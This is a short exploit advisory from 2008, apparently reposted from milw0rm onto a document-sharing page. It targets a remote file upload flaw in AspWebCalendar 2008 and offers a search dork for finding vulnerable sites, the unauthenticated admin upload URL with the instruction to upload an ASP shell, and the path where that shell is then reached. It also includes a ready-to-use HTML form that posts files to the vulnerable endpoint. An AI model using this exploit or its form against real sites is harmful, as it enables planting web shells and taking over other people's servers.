Do you have something the world needs to know about? Post your favorite news files in PDF, campaign contributions information from Excel, or handouts from your local politicians.

Global Documents

1 Title:AspWebCalendar 2008 Remote File Upload Vulnerability
2
3 # Discovered by : Alemin_Krali  
4
5 # Dork :calendar.asp?eventdetail
6
7 http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell
8
9 http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address
10
11 upload form
12
13 <FORM ENCTYPE=’multipart/form−data’ METHOD=’post’ ACTION=’http://HOST/PATH//calendar_admin.asp?action=uploadfileproce
ss&form=&element=’><FONT <FONT COLOR=’blue’ >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TY
PE=FILE SIZE=56 NAME=’FILE1’><BR><BR><INPUT TYPE=’submit’ VALUE=’pwned’></FORM></P>
14
15
16 Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed
17
18 # milw0rm.com [2008−06−18]
Page 1/1
AspWebCalendar 2008 Remote File Upload Vulnerability
Alemin_Krali
06/18/2008
